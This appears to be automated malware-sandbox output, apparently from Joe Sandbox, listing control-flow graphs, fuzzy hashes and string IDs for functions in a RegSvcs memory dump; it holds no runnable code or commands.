1965->1967 1968 1224dd7-1224ddb 1966->1968 1969 1224de5 1966->1969 1967->1966 1968->1969 1971 1224ddd-1224de0 call 1220ab8 1968->1971 1973 1224de6 1969->1973 1971->1969 1973->1973
                            Strings
                            Memory Dump Source
                            • Source File: 0000000C.00000002.3275034134.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_1220000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID: kfS$kfS
                            • API String ID: 0-607643310
                            • Opcode ID: 2f0bc63399e91b909348b8f0e1b42bd6e60d0b22c60ce3f95db3315608ec600a
                            • Instruction ID: 97b1be015fd42f75c4621713fb13f9834d6e6cf6df2f8f164577afa60c0f92a7
                            • Opcode Fuzzy Hash: 2f0bc63399e91b909348b8f0e1b42bd6e60d0b22c60ce3f95db3315608ec600a
                            • Instruction Fuzzy Hash: F7B16C70E2026AEFDF11DFACC8817DDBBF1AF88314F148129D918A7254EB749885CB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01223E74 Relevance: 2.7, Strings: 2, Instructions: 237COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 2040 1223e74-1223ee6 2042 1223f30-1223f32 2040->2042 2043 1223ee8-1223ef3 2040->2043 2045 1223f34-1223f8c 2042->2045 2043->2042 2044 1223ef5-1223f01 2043->2044 2046 1223f03-1223f0d 2044->2046 2047 1223f24-1223f2e 2044->2047 2054 1223fd6-1223fd8 2045->2054 2055 1223f8e-1223f99 2045->2055 2048 1223f11-1223f20 2046->2048 2049 1223f0f 2046->2049 2047->2045 2048->2048 2051 1223f22 2048->2051 2049->2048 2051->2047 2057 1223fda-1223ff2 2054->2057 2055->2054 2056 1223f9b-1223fa7 2055->2056 2058 1223fca-1223fd4 2056->2058 2059 1223fa9-1223fb3 2056->2059 2064 1223ff4-1223fff 2057->2064 2065 122403c-122403e 2057->2065 2058->2057 2060 1223fb7-1223fc6 2059->2060 2061 1223fb5 2059->2061 2060->2060 2063 1223fc8 2060->2063 2061->2060 2063->2058 2064->2065 2066 1224001-122400d 2064->2066 2067 1224040-1224052 2065->2067 2068 1224030-122403a 2066->2068 2069 122400f-1224019 2066->2069 2074 1224059-122408e 2067->2074 2068->2067 2071 122401b 2069->2071 2072 122401d-122402c 2069->2072 2071->2072 2072->2072 2073 122402e 2072->2073 2073->2068 2075 1224094-12240a2 2074->2075 2076 12240a4-12240aa 2075->2076 2077 12240ab-122410b 2075->2077 2076->2077 2084 122411b-122411f 2077->2084 2085 122410d-1224111 2077->2085 2086 1224121-1224125 2084->2086 2087 122412f-1224133 2084->2087 2085->2084 2088 1224113 2085->2088 2086->2087 2089 1224127-122412a call 1220ab8 2086->2089 2090 1224143-1224147 2087->2090 2091 1224135-1224139 2087->2091 2088->2084 2089->2087 2094 1224157-122415b 2090->2094 2095 1224149-122414d 2090->2095 2091->2090 2093 122413b-122413e call 1220ab8 2091->2093 2093->2090 2098 122416b-122416f 2094->2098 2099 122415d-1224161 2094->2099 2095->2094 2097 122414f-1224152 call 1220ab8 2095->2097 2097->2094 2100 1224171-1224175 2098->2100 2101 122417f 2098->2101 2099->2098 2103 1224163 2099->2103 2100->2101 2104 1224177 2100->2104 2105 1224180 2101->2105 2103->2098 2104->2101 2105->2105
                            Strings
                            Memory Dump Source
                            • Source File: 0000000C.00000002.3275034134.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_1220000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID: kfS$kfS
                            • API String ID: 0-607643310
                            • Opcode ID: e25e0f288f7d905925ccb3b735ac20ed5c1bc80b4c28600450add4df99728221
                            • Instruction ID: a181a200d5fc7356013a6334bbe5e09be86c0e23a7f1fca290b4c6cbe9ddf61f
                            • Opcode Fuzzy Hash: e25e0f288f7d905925ccb3b735ac20ed5c1bc80b4c28600450add4df99728221
                            • Instruction Fuzzy Hash: 37A19070E1025AEFDF10DFA8D981BDDBBF1BF58304F248129E505A7254DB789886CB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01224810 Relevance: 2.7, Strings: 2, Instructions: 180COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 2106 1224810-122489c 2109 12248e6-12248e8 2106->2109 2110 122489e-12248a9 2106->2110 2112 12248ea-1224902 2109->2112 2110->2109 2111 12248ab-12248b7 2110->2111 2113 12248da-12248e4 2111->2113 2114 12248b9-12248c3 2111->2114 2118 1224904-122490f 2112->2118 2119 122494c-122494e 2112->2119 2113->2112 2116 12248c7-12248d6 2114->2116 2117 12248c5 2114->2117 2116->2116 2120 12248d8 2116->2120 2117->2116 2118->2119 2121 1224911-122491d 2118->2121 2122 1224950-1224995 2119->2122 2120->2113 2123 1224940-122494a 2121->2123 2124 122491f-1224929 2121->2124 2130 122499b-12249a9 2122->2130 2123->2122 2125 122492b 2124->2125 2126 122492d-122493c 2124->2126 2125->2126 2126->2126 2128 122493e 2126->2128 2128->2123 2131 12249b2-1224a0f 2130->2131 2132 12249ab-12249b1 2130->2132 2139 1224a11-1224a15 2131->2139 2140 1224a1f-1224a23 2131->2140 2132->2131 2139->2140 2141 1224a17-1224a1a call 1220ab8 2139->2141 2142 1224a33-1224a37 2140->2142 2143 1224a25-1224a29 2140->2143 2141->2140 2146 1224a47-1224a4b 2142->2146 2147 1224a39-1224a3d 2142->2147 2143->2142 2145 1224a2b-1224a2e call 1220ab8 2143->2145 2145->2142 2150 1224a5b 2146->2150 2151 1224a4d-1224a51 2146->2151 2147->2146 2149 1224a3f 2147->2149 2149->2146 2153 1224a5c 2150->2153 2151->2150 2152 1224a53 2151->2152 2152->2150 2153->2153
                            Strings
                            Memory Dump Source
                            • Source File: 0000000C.00000002.3275034134.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_1220000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID: kfS$kfS
                            • API String ID: 0-607643310
                            • Opcode ID: a880377d0c22c416439db542b17d362d099533b74b17667833b949e674d10dc9
                            • Instruction ID: 78f4623faa47ce4040e7d3693f521366ae180a62bd233406914bc221d7724877
                            • Opcode Fuzzy Hash: a880377d0c22c416439db542b17d362d099533b74b17667833b949e674d10dc9
                            • Instruction Fuzzy Hash: 4A71B0B0E1029ADFDF10DFA9C88179DBBF2BF88314F148129E515A7254EB749841CF95
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01224804 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000C.00000002.3275034134.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_1220000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID: kfS$kfS
                            • API String ID: 0-607643310
                            • Opcode ID: b892567a48a174a8d5574e15727fa690d06307c3d7f752106b8490acecfbec85
                            • Instruction ID: 20210789c2c618c1be85914171c67fca18e2a573a95292281af580500648f81b
                            • Opcode Fuzzy Hash: b892567a48a174a8d5574e15727fa690d06307c3d7f752106b8490acecfbec85
                            • Instruction Fuzzy Hash: F371ADB0E1029ADFDF10DFA9C8817DDBBF1BF88314F148129E915A7250EB749842CB95
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01226ED7 Relevance: 2.6, Strings: 2, Instructions: 147COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000C.00000002.3275034134.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_1220000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID: LR]q$LR]q
                            • API String ID: 0-3917262905
                            • Opcode ID: 5ad57a53aa4a746323508b263976495b827158aae1e79d8fbc86c4768576ad74
                            • Instruction ID: e108d10f1e393e55b50d80ce7ced27d9e4fbbe66e07f167d4ab76a323658a01a
                            • Opcode Fuzzy Hash: 5ad57a53aa4a746323508b263976495b827158aae1e79d8fbc86c4768576ad74
                            • Instruction Fuzzy Hash: EA511231A20216AFDB15CF78C4507AEB7B2FF8A304F208469E846EB341DB759C46CB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01226CDD Relevance: 2.6, Strings: 2, Instructions: 134COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000C.00000002.3275034134.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_1220000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID: kfS$kfS
                            • API String ID: 0-607643310
                            • Opcode ID: 35cee817e1ed9bf8fdfcc54fe26564a546edbbfd05e3d8ac6537e1dbecf7033d
                            • Instruction ID: 284c43e7d3c049e6e820d108c856c7b3e72d5cd54aea1a72176eb2c5877ae32e
                            • Opcode Fuzzy Hash: 35cee817e1ed9bf8fdfcc54fe26564a546edbbfd05e3d8ac6537e1dbecf7033d
                            • Instruction Fuzzy Hash: 68513471D202299FDB18CFA9C885BADFBF1BF48304F148129E819BB391D774A841CB95
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01226CE8 Relevance: 2.6, Strings: 2, Instructions: 132COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000C.00000002.3275034134.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_1220000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID: kfS$kfS
                            • API String ID: 0-607643310
                            • Opcode ID: 7a71ae412c57bc4841b0f11ff5385e2fd8ee9f855734872d34e1dd2e1b17596a
                            • Instruction ID: 6d61d6d26d07bb832989b821a0ccd7fe8d491fa30c1e4c32b8ab48c76c64a77e
                            • Opcode Fuzzy Hash: 7a71ae412c57bc4841b0f11ff5385e2fd8ee9f855734872d34e1dd2e1b17596a
                            • Instruction Fuzzy Hash: B8513471D202299FDB18CFA9C885B9DBBF1BF48704F148129E819BB391D774A841CF95
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0122F405 Relevance: 1.4, Strings: 1, Instructions: 107COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000C.00000002.3275034134.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_1220000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID: PH]q
                            • API String ID: 0-3168235125
                            • Opcode ID: 9c8a6b24ff21df5d6fcb1203e491c548b089887f58ec781301eb63e1a5602b1f
                            • Instruction ID: 8e895264e9eac9930b4204f09391f2e57666c10511056fa93c6e503df90ac038
                            • Opcode Fuzzy Hash: 9c8a6b24ff21df5d6fcb1203e491c548b089887f58ec781301eb63e1a5602b1f
                            • Instruction Fuzzy Hash: 933124307102129FDB09AF78D26066E3BF2EF88240F108579E546DB389DE75DC4ACB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0122F418 Relevance: 1.4, Strings: 1, Instructions: 105COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000C.00000002.3275034134.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_1220000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID: PH]q
                            • API String ID: 0-3168235125
                            • Opcode ID: 1a1c35ca69e898b8a30cc5a39243b28859cae05a6a3b70406badd634ec2802b3
                            • Instruction ID: 5c80995d4fad088c634590c3c2a9732b467dabc6dd08eb1b6c91a19041ff3335
                            • Opcode Fuzzy Hash: 1a1c35ca69e898b8a30cc5a39243b28859cae05a6a3b70406badd634ec2802b3
                            • Instruction Fuzzy Hash: DD3104307102129FDB19AB38D66466F3BF6EF84240F208538E506DB389DE75DC4ACB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01226F78 Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000C.00000002.3275034134.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_1220000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID: LR]q
                            • API String ID: 0-3081347316
                            • Opcode ID: 149a4d14ebeaa6fa503e9f2be4fee8950306e699ae5ae01a8ef76474ee2a7618
                            • Instruction ID: 82f91f40bd80289484f58cc2de82962a681960fa34b248f01066603807d75f21
                            • Opcode Fuzzy Hash: 149a4d14ebeaa6fa503e9f2be4fee8950306e699ae5ae01a8ef76474ee2a7618
                            • Instruction Fuzzy Hash: E3316135E2021AAFDF15CFA9C440BAEB7B1FF95300F608525E906EB240EB75A945CB51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 012226DC Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000C.00000002.3275034134.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_1220000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID: kfS
                            • API String ID: 0-647291951
                            • Opcode ID: 090edddaa51e3fd7a903d97cc93c81463af4c278ac7944c62a7f436ed215e188
                            • Instruction ID: 0570950095fa6283308818f571c18f6b2bb70877dfbabc564abb2f3b3a9a4479
                            • Opcode Fuzzy Hash: 090edddaa51e3fd7a903d97cc93c81463af4c278ac7944c62a7f436ed215e188
                            • Instruction Fuzzy Hash: 9141FFB0D00249EFDB14CFA9C580ADEBFB5FF48314F248029E809AB254DB759946CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 012226E8 Relevance: 1.3, Strings: 1, Instructions: 90COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000C.00000002.3275034134.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_1220000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID: kfS
                            • API String ID: 0-647291951
                            • Opcode ID: 53effc8cf1f04d60137b2b4966bb309a09e1a4464f224daec06c64b205e29ca4
                            • Instruction ID: 48a75fed31686d4271e1eba4d1ee9d066fde94bbead34905785c23cda5ccb5b1
                            • Opcode Fuzzy Hash: 53effc8cf1f04d60137b2b4966bb309a09e1a4464f224daec06c64b205e29ca4
                            • Instruction Fuzzy Hash: 4341EDB0D10249EFDB14DFA9C584ADEBFB5FF48310F248029E809AB254DB75A945CBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01226B87 Relevance: 1.3, Strings: 1, Instructions: 70COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000C.00000002.3275034134.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_1220000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID: LR]q
                            • API String ID: 0-3081347316
                            • Opcode ID: b1265f30110d98965fb79a556897b07234528a2d9c4184eae715889f1daff8db
                            • Instruction ID: 6401f798fdd4634b8ccbee5686b6abc91394f5b8a31d9b6711b27bafd4e27979
                            • Opcode Fuzzy Hash: b1265f30110d98965fb79a556897b07234528a2d9c4184eae715889f1daff8db
                            • Instruction Fuzzy Hash: DC1193316092819FC3165F7884641AE7FB2EF8B210B0544EBC8C5CF392DA355C4AC792
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0122790B Relevance: .6, Instructions: 555COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000C.00000002.3275034134.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_1220000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 576d9fd4e4012c10d4d68d5864c0c25fe81874e33a5903a664a4916d8d15c017
                            • Instruction ID: ceb0c9053613c9412c799afa250fb3725f97db12a4d89899b71de0412a920fa0
                            • Opcode Fuzzy Hash: 576d9fd4e4012c10d4d68d5864c0c25fe81874e33a5903a664a4916d8d15c017
                            • Instruction Fuzzy Hash: C4127130710212DFDB19AB3CE49466D33AAFB85304B145A38E646CBB65CF76EC4AC791
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01229364 Relevance: .2, Instructions: 239COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000C.00000002.3275034134.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_1220000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 9b7373efa10b72f957e3d8fa1aaae9d546487216a07e7d82c0ad422c9ad8922b
                            • Instruction ID: e4f4c5643a9930ab62bd85a60262fa78254d04a5e904a7aa1427e8b9b17b96d2
                            • Opcode Fuzzy Hash: 9b7373efa10b72f957e3d8fa1aaae9d546487216a07e7d82c0ad422c9ad8922b
                            • Instruction Fuzzy Hash: 6A91AD34A101259FDF25DF68D584AADBBF6EF88314F148529E906DB3A5DB30EC82CB40
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0122112B Relevance: .1, Instructions: 115COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000C.00000002.3275034134.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_1220000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e83e6f2b08f4c71fd96f90c919ab29328afe375c9f49c7629f59ca09e4114fe2
                            • Instruction ID: 0f212d866b0308aa39d8e346e8638ddaa85caa76ba4900bec8751b2d3c7d6ef1
                            • Opcode Fuzzy Hash: e83e6f2b08f4c71fd96f90c919ab29328afe375c9f49c7629f59ca09e4114fe2
                            • Instruction Fuzzy Hash: 44510130902152CFCB0AFF7AF9849443FA5FB563083048B69D2419727ED77A7989DB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01221138 Relevance: .1, Instructions: 112COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000C.00000002.3275034134.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_1220000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 59c82f083ac3bdde23b51d9b15eb505ca22d88bee6f71dff9f7acb74d1cbef7c
                            • Instruction ID: 01274a9175b5f1ac3015afd001448fb5b654f1b81dd3b1d54728f16e6de54525
                            • Opcode Fuzzy Hash: 59c82f083ac3bdde23b51d9b15eb505ca22d88bee6f71dff9f7acb74d1cbef7c
                            • Instruction Fuzzy Hash: ED51DC30A12162CFCB09FF7AF9849443FA5FB553083008B69D2419B27DDB7A7989DB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0122F2C9 Relevance: .1, Instructions: 98COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000C.00000002.3275034134.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_1220000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f758bb7ac57616d1d5a8e53ce8e546981ddeec988bf9637556d814f962f63a9d
                            • Instruction ID: f46b41aa54f9902bfc373d000617f3e04e4f038486f8d091bc87e1c903580543
                            • Opcode Fuzzy Hash: f758bb7ac57616d1d5a8e53ce8e546981ddeec988bf9637556d814f962f63a9d
                            • Instruction Fuzzy Hash: D331B030E102169BDB05CFA9C59469EBBB6FF8A300F10C529E846EB350DF70AC46CB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0122F2D8 Relevance: .1, Instructions: 91COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000C.00000002.3275034134.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_1220000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 604db47d9ed893588c12a4c565ea4811c908706db32818f3a22d96380779f67b
                            • Instruction ID: 76dbe8efd5277545f95baa8ed8526c990cbfe5b8f43a264a561481d3430b2fd5
                            • Opcode Fuzzy Hash: 604db47d9ed893588c12a4c565ea4811c908706db32818f3a22d96380779f67b
                            • Instruction Fuzzy Hash: FC318F35E102169BDB09CFA9D59469EBBB6FF89300F10C529E916EB350DF70AC46CB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0122924F Relevance: .1, Instructions: 82COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000C.00000002.3275034134.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_1220000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 36eb04488e4a00f375fc0f890b14193b284156d90fd421ed22017671f484729b
                            • Instruction ID: 3254a18d49750414c69a4d85d4338781c7212bc4760b4723577a523e3abd2132
                            • Opcode Fuzzy Hash: 36eb04488e4a00f375fc0f890b14193b284156d90fd421ed22017671f484729b
                            • Instruction Fuzzy Hash: D731B331E102269BDF05CFA9D49469EB7B2FF8A304F14C61AE905EB241DB719885CB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0122169F Relevance: .1, Instructions: 81COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000C.00000002.3275034134.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_1220000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 32bbd29433d40f63759525ae5c380eee97537035a106eab299d0c6fa6047bfa2
                            • Instruction ID: a2eb98ceb1ecd03b93266213c8535b45c396f85e00d1e3dc6066418251151d55
                            • Opcode Fuzzy Hash: 32bbd29433d40f63759525ae5c380eee97537035a106eab299d0c6fa6047bfa2
                            • Instruction Fuzzy Hash: 8F21F9345100226FDF27AB6DF844F6D3759EB45308F004A65D105C726ADB29DD96CB92
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01229260 Relevance: .1, Instructions: 78COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000C.00000002.3275034134.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_1220000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 5157a49c3c26ef9f190d21ef05967d4432877eac33464bf20cf4dd143f08b13e
                            • Instruction ID: c9063c596b900944d0e6c9f8f4ebcb6b49c93d84d0362d5bd517b4842a3a7486
                            • Opcode Fuzzy Hash: 5157a49c3c26ef9f190d21ef05967d4432877eac33464bf20cf4dd143f08b13e
                            • Instruction Fuzzy Hash: E921B631E102269BDF05CFA9D49069EF7B6FF8A304F14C619E905EB340DB71A886CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01229150 Relevance: .1, Instructions: 77COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000C.00000002.3275034134.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_1220000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 11c15ff103e70b020a785b0ab8dccd0da77b8fcb887146394d7137b8c805ddc6
                            • Instruction ID: 160f3d8e27c85659bda7d475ce7939a8a594947c2060bba48a6ef3fe4783cacd
                            • Opcode Fuzzy Hash: 11c15ff103e70b020a785b0ab8dccd0da77b8fcb887146394d7137b8c805ddc6
                            • Instruction Fuzzy Hash: 6321F930E14226EBDF09CFA5D4545DEF7B2AF85304F10851AE915FB340DB709886CB51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01224F89 Relevance: .1, Instructions: 75COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000C.00000002.3275034134.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_1220000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 529f74e74f1357b5788c833a58f755693431050e1697b2f7135ad2eb4f1fb1be
                            • Instruction ID: 96ba27dea0265f0521352b59d31b6bc77c7c0e910d1357355205d08589f58731
                            • Opcode Fuzzy Hash: 529f74e74f1357b5788c833a58f755693431050e1697b2f7135ad2eb4f1fb1be
                            • Instruction Fuzzy Hash: 81212A30610125DFCB54EF79C958AAD7BF1EF4D304B1044A8E946EB365DB3A9D05CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01221878 Relevance: .1, Instructions: 74COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000C.00000002.3275034134.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_1220000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a5f05858eea98ffc5a557301689ba0c442dbeea2ed62d45228715f63b120c885
                            • Instruction ID: 6a25d2246d453baccdb3d23ca0746777a942d6ac4cfaa7535a6a7f1f97fdfb8b
                            • Opcode Fuzzy Hash: a5f05858eea98ffc5a557301689ba0c442dbeea2ed62d45228715f63b120c885
                            • Instruction Fuzzy Hash: 6F21AE30B10266DFEB24EB78C555BAD77F2AF49304F200468D602EB2A1DF3A8D55CB61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0107D01C Relevance: .1, Instructions: 72COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000C.00000002.3274567834.000000000107D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0107D000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_107d000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 20447a5d8f39c6028ddc56c260ad931906abc6597a9e6149c1e299a08cdd08b0
                            • Instruction ID: ad13960cc0d70a776f055616734af62c6b8569ad9da0c1ad56f7504374f5bb2d
                            • Opcode Fuzzy Hash: 20447a5d8f39c6028ddc56c260ad931906abc6597a9e6149c1e299a08cdd08b0
                            • Instruction Fuzzy Hash: 44212571A04200DFCB16DF68D980B16BFA5FF84314F20C5ADE9890B256C33AD407CBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01221383 Relevance: .1, Instructions: 71COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000C.00000002.3275034134.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_1220000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d202f0fb0e4668086180bf26c089521f5e7d988c597833cb3b799d34e5d5bfa3
                            • Instruction ID: c0dc0d5cd1f67c744c09311f7473b94447bed57c4e30d0c70e8a06858b230c2d
                            • Opcode Fuzzy Hash: d202f0fb0e4668086180bf26c089521f5e7d988c597833cb3b799d34e5d5bfa3
                            • Instruction Fuzzy Hash: F0213D309102629FDF37572DE044F6C3B66EB02315F000969E64FC7392D629CCA6C382
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01229A30 Relevance: .1, Instructions: 71COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000C.00000002.3275034134.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_1220000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ab6fbd338bfce686481bec994c8440fc9b547fbabfa29ef7859d9b9c18d23fba
